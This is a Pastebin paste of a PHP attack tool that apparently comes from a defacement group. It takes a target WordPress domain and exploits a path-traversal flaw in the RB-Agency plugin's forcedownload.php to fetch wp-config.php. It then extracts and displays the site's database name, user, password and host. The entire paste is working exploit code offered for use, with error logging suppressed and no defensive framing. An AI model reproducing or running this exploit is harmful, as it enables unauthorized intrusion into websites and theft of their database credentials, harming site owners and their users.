Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- /*
- Name app : Wordpress Auto Get DataBase (AFD)
- Author / Editor Script : AZZATSSINS CYBERSERKERS
- Email : [email protected]
- */
- echo"<title>WordPress Get Database | RB-Agency</title><center>
- <body bgcolor=silver><u><i><b><h1>© AZZATSSINS CYBERSERKERS</h1>
- </b></i></u><br>
- <form method='post'>
- Domain: <br>
- <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
- <input type='submit' name='azzatssins' value='GET DB!'>
- </form>";
- $site = $_POST['url'];
- if($_POST['azzatssins']) {
- echo "<br><u><b>Target : ".$site."</b></u><br>";
- $expl = array("/wp-content/plugins/rb-agency/ext/
- forcedownload.php?file=../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../wp-config.php");
- foreach($expl as $exploit){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- $xp = curl_exec ($ch);
- curl_close($ch);
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
